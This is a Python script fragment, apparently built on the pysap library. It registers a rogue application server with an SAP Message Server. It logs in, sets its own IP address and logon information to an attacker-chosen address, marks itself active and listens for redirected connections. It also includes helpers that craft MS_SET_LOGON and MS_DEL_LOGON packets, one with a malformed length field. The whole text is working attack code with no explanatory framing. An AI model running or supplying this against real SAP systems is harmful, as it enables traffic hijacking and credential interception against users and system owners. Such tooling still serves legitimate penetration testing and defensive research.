def ms_build_set_logon(ptype, serv_info): if ptype == 'diag': logon_type = 'MS_LOGON_DIAG' port = serv_info['diag_port'] elif ptype == 'rfc': logon_type = 'MS_LOGON_RFC' port = serv_info['rfc_port'] address = serv_info['ip'] host = serv_info['fqdn'] p = SAPMS(fromname=my_name, toname=msg_server_name, flag='MS_REQUEST', iflag='MS_SEND_NAME', opcode='MS_SET_LOGON', logon=SAPMSLogon(type=logon_type, port=port, address=address, logonname_length=0, prot_length=0, host_length=len(host), host=host, misc_length=4, misc='LB=9')) / Raw(load="\xff\xff") return p
def ms_build_del_logon_by_type(type): return SAPMS(toname=msg_server_name, fromname=my_name, flag='MS_REQUEST', iflag='MS_SEND_NAME', opcode='MS_DEL_LOGON', logon=SAPMSLogon(type=type, logonname_length=0, prot_length=0, host_length=0, misc_length=0, address6_length=65535))
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) # Initiate the connection conn = SAPRoutedStreamSocket.get_nisocket(options.remote_host, options.remote_port, options.route_string, base_cls=SAPMS) print("[*] Connected to the message server %s:%d" % (options.remote_host, options.remote_port)) # Set release information prop = SAPMSProperty(id=7, release="720", patchno=70, supplvl=0, platform=0) p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x43, property=prop) print("[*] Setting release information") conn.send(p) # Perform the login enabling the DIA+BTC+ICM services p = SAPMS(flag=0x08, iflag=0x08, msgtype=0x89, toname="-", fromname=options.client) print("[*] Sending login packet") conn.sr(p)[SAPMS] print("[*] Login performed") # Changing the status to starting p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x05, toname="-", fromname=options.client) print("[*] Changing server's status to starting") conn.send(p) # Set IP address p = SAPMS(flag=0x01, iflag=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x06, opcode_version=0x01, change_ip_addressv4=options.logon_address) print("[*] Setting IP address") response = conn.sr(p)[SAPMS] print("[*] IP address set") response.show() # Set logon information l = SAPMSLogon(type=2, port=3200, address=options.logon_address, host=options.client, misc="LB=3") p = SAPMS(flag=0x01, iflag=0x01, msgtype=0x01, toname="MSG_SERVER", fromname=options.client, opcode=0x2b, logon=l) print("[*] Setting logon information") response = conn.sr(p)[SAPMS] print("[*] Logon information set") response.show() # Set the IP Address property prop = SAPMSProperty(client=options.client, id=0x03, address=options.logon_address) p = SAPMS(flag=0x02, iflag=0x01, toname="-", fromname=options.client, opcode=0x43, property=prop) print("[*] Setting IP address property") response = conn.sr(p)[SAPMS] print("[*] IP Address property set") response.show() # Changing the status to active p = SAPMS(flag=0x01, iflag=0x09, msgtype=0x01, toname="-", fromname=options.client) print("[*] Changing server's status to active") conn.send(p) # Wait for connections try: while True: response = conn.recv()[SAPMS] response.show() except KeyboardInterrupt: print("[*] Cancelled by the user !") # Send MS_LOGOUT packet p = SAPMS(flag=0x00, iflag=0x04, toname="MSG_SERVER", fromname=options.client) print("[*] Sending logout packet") conn.send(p)